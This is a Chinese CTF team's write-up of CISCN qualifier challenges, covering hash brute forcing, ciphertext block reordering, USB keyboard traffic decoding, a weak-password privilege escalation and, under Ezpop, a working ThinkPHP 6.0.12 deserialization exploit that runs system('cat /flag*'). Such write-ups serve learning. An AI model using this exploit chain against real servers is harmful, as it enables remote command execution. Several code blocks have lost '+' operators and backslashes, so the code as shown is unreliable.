Debuggerrr²战队CISCN初赛解题记录

2024-02-28 20:28:17 浏览数 (2)

Crypto

签到电台

签到题,开始没看到豪密剖析,对照密码表一个一个找的,额。将7个电码和密码本前28个数字每四个一组进行模十加法,看示例是加猜测全部是加运算,得到电码答案后send即可。

基于挑战码的双向认证

密码学题目,但完全不是以密码学方法完成的…该题是一道双向验证密文题目,根据题目文档进入 src/login_user 模块,分析proc_login_response函数。一顿分析后发现很多函数看不懂,突然想到题目说明服务端验证函数已完成,找到login_server模块进入查看函数,对照两函数,但是不知道怎么计算Mb来和 Mb对比,思路线索断了。

题目存在flag验证机制,猜测靶机存在flag文件,开始暴力查找。

首先尝试文件名搜索,排除若干无权限文件得到两个 txt 文件,尝试提交,正确。

基于挑战码的双向认证2

同上。

基于挑战码的双向认证3

采取前两道题的思路,无果。 尝试弱密码**(toor)**,提权成功,再次暴力搜索找到flag文件。

ISO9798

看提示ISO9798-2,额。。没怎么接触过,直接nc看题,发现得知sha256的后部分,直接爆破。

代码语言:javascript复制
import hashlib 
data= 'Gt1DDTjUUYIuQscO' 
res = 'e9e04036a480e68bb4d3897939bafd6dec3767ac9d552d17e000709ac08fefa7' 
for i in range(127): 
    for j in range(127): 
        for k in range(127): 
            for m in range(127): 
                s = chr(i)   chr(j)   chr(k)   chr(m)   data 
                if hashlib.sha256(s.encode('utf-8')).hexdigest() == res: 
                    print(s) 
                    break 
s = 'YWAVGt1DDTjUUYIuQscO'

第二步提示发送一个128bit的16进制数,python随机生成一个。

第三步给了Encrypt(rA||rB||B, k),要求给出Encrypt(rB||rA, k),并未给出加密函数,因此猜测是在明

文上动一些手脚即可。猜测为ECB或者CBC轮换加密。

最后根据加密结果为96位,并且轮换参数有rA,rB,B三个,猜测为ECB加密并且分三组轮换,因此

rA,rB和B分别对应密文三部分,要求Encrypt(rB||rA, k),只需取给出密文的前64位倒置轮换即可。

代码语言:javascript复制
s = '83368a8ab47877c4e739d1455a6f15211716f83438b58feba5a83f3c3a5c5774847790a60378dbb 4f39c6400337bbe8c' 
print(s[32:64]   s[:32]) 
res = '1716f83438b58feba5a83f3c3a5c577483368a8ab47877c4e739d1455a6f1521'

PWN

login-nomal

拿到文件后,首先 check 一下保护措施,全绿…保护全开

Misc

问卷调查

问卷结束后得flag。

ez_usb

首先题目给的提示是这个是键盘流量,那么我们搜索8个字节长度的数据包,这里发现有两个Destination的数据包的长度是8,说明键盘给两个地方输入了值。

利用tshark分别提取出压缩包和压缩密码

代码语言:javascript复制
tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.8.1"' -T fields -e usb.capdata > 1.txt
tshark -r ./ez_usb.pcapng -Y 'usb.data_len == 8' -Y 'usb.src =="2.10.1"' -T fields -e usb.capdata > 2.txt

再利用脚本

代码语言:javascript复制
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"_","2e":" ","2f":"{","30":"}","31":"|","32":"<NON>","33":""","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
def out(file):
    keys=open(file)
    output = []
    for line in keys:
        try:
            if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
                 continue
            if line[6:8] in normalKeys.keys():
                output  = [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
            else:
                output  = ['[unknown]']
        except:
            pass
    keys.close()
flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass
for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag =1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass
print ('output :'   "".join(output))
print()
out("1.txt")
out("2.txt") 

然后用Notepad 打开转ASCII保存,再用rar打开,输入密码即可拿到flag…..

但是当时我们做的时候,确实没想到这个是个压缩包,把信息提取出来了,看到了内容….没往压缩包上考虑

Web

Ezpop
  1. Thinkphp6.0.12LTS 反序列化漏洞https://www.jianshu.com/p/92018015ec5e
  2. Exp.php
代码语言:javascript复制
<?php 
    namespace think{ 
    abstract class Model{ 
        private $lazySave = false; 
        private $data = []; 
        private $exists = false; 
        protected $table; 
        private $withAttr = []; 
        protected $json = []; 
        protected $jsonAssoc = false;
        function __construct($obj = '')
        { 
            $this->lazySave = True; 
            $this->data = ['whoami' => ['cat /flag*']]; 
            $this->exists = True; 
            $this->table = $obj; 
            $this->withAttr = ['whoami' => ['system']]; 
            $this->json = ['whoami',['whoami']]; 
            $this->jsonAssoc = True; 
        }
    }
}
namespace thinkmodel{ 
    use thinkModel; 
    class Pivot extends Model{ 
    }
}
namespace{ 
    echo(serialize(new thinkmodelPivot(new thinkmodelPivot()))); }

0 人点赞